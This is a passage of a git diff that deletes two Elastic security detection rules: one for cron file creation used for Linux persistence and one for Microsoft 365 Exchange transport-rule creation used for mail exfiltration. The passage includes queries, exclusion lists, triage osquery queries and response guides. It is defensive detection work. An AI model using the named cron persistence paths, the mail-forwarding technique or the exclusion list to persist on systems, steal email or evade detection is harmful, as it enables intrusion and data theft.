OR path LIKE '/etc/cron.hourly/%' OR path LIKE '/etc/cron.daily/%' OR path LIKE '/etc/cron.weekly/%' OR\\npath LIKE '/etc/cron.monthly/%' OR path LIKE '/var/spool/cron/crontabs/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- Systemd Service Created - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "file where host.os.type == \"linux\" and\nevent.action in (\"rename\", \"creation\") and file.path : (\n \"/etc/cron.allow\", \"/etc/cron.deny\", \"/etc/cron.d/*\", \"/etc/cron.hourly/*\", \"/etc/cron.daily/*\", \"/etc/cron.weekly/*\",\n \"/etc/cron.monthly/*\", \"/etc/crontab\", \"/var/spool/cron/crontabs/*\", \"/var/spool/anacron/*\"\n) and not (\n process.executable in (\n \"/bin/dpkg\", \"/usr/bin/dpkg\", \"/bin/dockerd\", \"/usr/bin/dockerd\", \"/usr/sbin/dockerd\", \"/bin/microdnf\",\n \"/usr/bin/microdnf\", \"/bin/rpm\", \"/usr/bin/rpm\", \"/bin/snapd\", \"/usr/bin/snapd\", \"/bin/yum\", \"/usr/bin/yum\",\n \"/bin/dnf\", \"/usr/bin/dnf\", \"/bin/podman\", \"/usr/bin/podman\", \"/bin/dnf-automatic\", \"/usr/bin/dnf-automatic\",\n \"/bin/pacman\", \"/usr/bin/pacman\", \"/usr/bin/dpkg-divert\", \"/bin/dpkg-divert\", \"/sbin/apk\", \"/usr/sbin/apk\",\n \"/usr/local/sbin/apk\", \"/usr/bin/apt\", \"/usr/sbin/pacman\", \"/bin/podman\", \"/usr/bin/podman\", \"/usr/bin/puppet\",\n \"/bin/puppet\", \"/opt/puppetlabs/puppet/bin/puppet\", \"/usr/bin/chef-client\", \"/bin/chef-client\",\n \"/bin/autossl_check\", \"/usr/bin/autossl_check\", \"/proc/self/exe\", \"/dev/fd/*\", \"/usr/bin/pamac-daemon\",\n \"/bin/pamac-daemon\", \"/usr/local/bin/dockerd\", \"/opt/elasticbeanstalk/bin/platform-engine\",\n \"/opt/puppetlabs/puppet/bin/ruby\", \"/usr/libexec/platform-python\", \"/opt/imunify360/venv/bin/python3\",\n \"/opt/eset/efs/lib/utild\", \"/usr/sbin/anacron\", \"/usr/bin/podman\", \"/kaniko/kaniko-executor\"\n ) or\n file.path like (\"/var/spool/cron/crontabs/tmp.*\", \"/etc/cron.d/jumpcloud-updater\") or\n file.extension in (\"swp\", \"swpx\", \"swx\", \"dpkg-remove\") or\n file.Ext.original.extension == \"dpkg-new\" or\n process.executable : (\n \"/nix/store/*\", \"/var/lib/dpkg/*\", \"/tmp/vmis.*\", \"/snap/*\", \"/dev/fd/*\", \"/usr/libexec/platform-python*\"\n ) or\n process.executable == null or\n process.name in (\n \"crond\", \"executor\", \"puppet\", \"droplet-agent.postinst\", \"cf-agent\", \"schedd\", \"imunify-notifier\", \"perl\",\n \"jumpcloud-agent\", \"crio\", \"dnf_install\", \"utild\"\n ) or\n (process.name == \"sed\" and file.name : \"sed*\") or\n (process.name == \"perl\" and file.name : \"e2scrub_all.tmp*\") \n)\n", - "references": [ - "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/", - "https://www.elastic.co/security-labs/primer-on-persistence-mechanisms" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": false, - "name": "file.Ext.original.extension", - "type": "unknown" - }, - { - "ecs": true, - "name": "file.extension", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.003", - "name": "Cron", - "reference": "https://attack.mitre.org/techniques/T1053/003/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.003", - "name": "Cron", - "reference": "https://attack.mitre.org/techniques/T1053/003/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.003", - "name": "Cron", - "reference": "https://attack.mitre.org/techniques/T1053/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 15 - }, - "id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9_15", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_207.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_207.json deleted file mode 100644 index 915b6a1693d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data.", - "false_positives": [ - "A new transport rule may be created by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Transport Rule Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Transport Rule Creation\n\nMicrosoft 365 Exchange transport rules automate email handling, applying actions like forwarding or blocking based on conditions. While beneficial for managing communications, adversaries can exploit these rules to redirect emails externally, facilitating data exfiltration. The detection rule monitors successful creation of new transport rules, flagging potential misuse by identifying specific actions and outcomes in audit logs.\n\n### Possible investigation steps\n\n- Review the audit logs for the event.dataset:o365.audit to identify the user account responsible for creating the new transport rule.\n- Examine the event.provider:Exchange and event.category:web fields to confirm the context and source of the rule creation.\n- Investigate the event.action:\"New-TransportRule\" to understand the specific conditions and actions defined in the newly created transport rule.\n- Check the event.outcome:success to ensure the rule creation was completed successfully and assess if it aligns with expected administrative activities.\n- Analyze the transport rule settings to determine if it includes actions that forward emails to external domains, which could indicate potential data exfiltration.\n- Correlate the findings with other security events or alerts to identify any patterns or anomalies that might suggest malicious intent.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when IT staff create or modify transport rules for legitimate purposes. To manage this, establish a baseline of expected rule creation activities and exclude these from alerts.\n- Automated systems or third-party applications that integrate with Microsoft 365 might create transport rules as part of their normal operation. Identify these systems and create exceptions for their known actions.\n- Changes in organizational policies or email handling procedures can lead to legitimate rule creations. Document these changes and update the monitoring system to recognize them as non-threatening.\n- Regular audits or compliance checks might involve creating temporary transport rules. Coordinate with audit teams to schedule these activities and temporarily adjust alert thresholds or exclusions during these periods.\n\n### Response and remediation\n\n- Immediately disable the newly created transport rule to prevent further unauthorized email forwarding or data exfiltration.\n- Conduct a thorough review of the audit logs to identify any other suspicious transport rules or related activities that may indicate a broader compromise.\n- Isolate the affected user accounts or systems associated with the creation of the transport rule to prevent further unauthorized access or actions.\n- Reset passwords and enforce multi-factor authentication for the affected accounts to secure access and prevent recurrence.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Escalate the incident to the incident response team if there is evidence of a broader compromise or if sensitive data has been exfiltrated.\n- Implement enhanced monitoring and alerting for transport rule changes to detect and respond to similar threats more effectively in the future.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Exfiltration", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [ - { - "id": "T1537", - "name": "Transfer Data to Cloud Account", - "reference": "https://attack.mitre.org/techniques/T1537/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml index 82e255cca6b..8b61379cfce 100644 --- a/packages/security_detection_engine/manifest.yml +++ b/packages/security_detection_engine/manifest.yml @@ -21,4 +21,4 @@ source: license: Elastic-2.0 title: Prebuilt Security Detection Rules type: integration -version: 8.19.8 +version: 8.19.9-beta.1